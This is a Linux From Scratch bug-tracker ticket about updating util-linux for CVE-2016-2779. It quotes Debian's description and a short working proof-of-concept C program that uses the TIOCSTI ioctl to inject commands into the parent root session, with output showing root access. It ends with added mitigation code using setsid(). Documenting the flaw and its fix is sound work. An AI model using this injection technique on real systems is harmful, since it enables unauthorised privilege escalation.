#3987: util-linux v2.29-rc1 (waiting for stable) (CVE-2016-2779)
 Reporter:  bdubbs@…  |       Owner:  Samuel
     Type:  task      |      Status:  assigned
 Priority:  normal    |   Milestone:  7.11
Component:  Book      |     Version:  SVN
 Severity:  normal    |  Resolution:
 Keywords:            |
Changes (by Samuel):

 * owner:  lfs-book@… => Samuel
 * status:  new => assigned


 From the Debian bugs page:

 When executing a program via "runuser -u nonpriv program" the nonpriv
 session can escape to the parent session by using the TIOCSTI ioctl to
 push characters into the terminal's input buffer, allowing privilege
 escalation. This issue has been fixed in "su" by calling setsid() and in
 "sudo" by using the "use_pty" flag.

 # cat test.c
 #include <sys/ioctl.h>

 int main()
 {
   char *cmd = "id\n";
   /* push each byte of cmd into the terminal's input queue */
   while (*cmd)
     ioctl(0, TIOCSTI, cmd++);
   return 0;
 }

 # gcc test.c -o test
 # id saken
 uid=1000(saken) gid=1000(saken) groups=1000(saken)

 # runuser -u saken ./test ---> last command I type in
 # id ---> did not type this
 uid=0(root) gid=0(root) groups=0(root)

 Doug is helping me with this, but I'll take the ticket. I don't know
 whether we shouldn't just use this version and not stable.
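
 The mitigation the Debian text attributes to su, shown as an added example
 (this is not code from the ticket, from Debian or from util-linux; the
 function names are mine). Linux only honours TIOCSTI when the target tty is
 the caller's controlling terminal (or the caller has CAP_SYS_ADMIN), so a
 wrapper that calls setsid() in the child before exec leaves the child with
 no controlling terminal and the inherited tty descriptor can no longer be
 used to inject input. The self-check opens /dev/tty, which fails with ENXIO
 once there is no controlling terminal; the privilege drop a real runuser
 would do is left out so the example runs unprivileged.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if the calling process has a controlling terminal, 0 otherwise.
 * Opening /dev/tty fails with ENXIO when there is no controlling tty. */
int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDONLY | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* Forks, calls setsid() in the child and reports whether the child still
 * has a controlling terminal: 0 means no tty (the mitigation holds),
 * 1 means a tty is still attached, -1 means the check could not run. */
int child_has_tty_after_setsid(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0)          /* a fresh child is never a group leader */
            _exit(2);
        _exit(has_controlling_tty());
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 2 ? -1 : WEXITSTATUS(status);
}

/* Runs argv in a child that first detaches from the controlling terminal.
 * Returns the child's exit status, or -1 if it could not be run. In a
 * runuser-style tool the setgid()/setuid() calls would sit between setsid()
 * and execvp(); they are omitted here (assumption: run unprivileged). */
int run_detached(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0) {
            perror("setsid");
            _exit(127);
        }
        execvp(argv[0], argv);
        perror("execvp");
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Constructed demo command: the detached child exits with status 3. */
int run_detached_demo(void)
{
    char *const argv[] = { "sh", "-c", "exit 3", NULL };
    return run_detached(argv);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    int r = child_has_tty_after_setsid();
    printf("child keeps controlling tty after setsid(): %s\n",
           r == 0 ? "no" : r == 1 ? "yes" : "unknown");
    return run_detached(argv + 1);
}
```

 Build with `gcc -o detach detach.c` and run `./detach id`: the check prints
 "no" and the command still runs, but a TIOCSTI attempt from inside it is
 refused with EPERM because the child no longer owns the terminal. The
 trade-off is that the detached command also loses job control on that
 terminal, which is why sudo's use_pty alternative allocates a fresh pty
 instead.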

Ticket URL: <http://wiki.linuxfromscratch.org/lfs/ticket/3987#comment:3>
LFS Trac <http://wiki.linuxfromscratch.org/lfs/>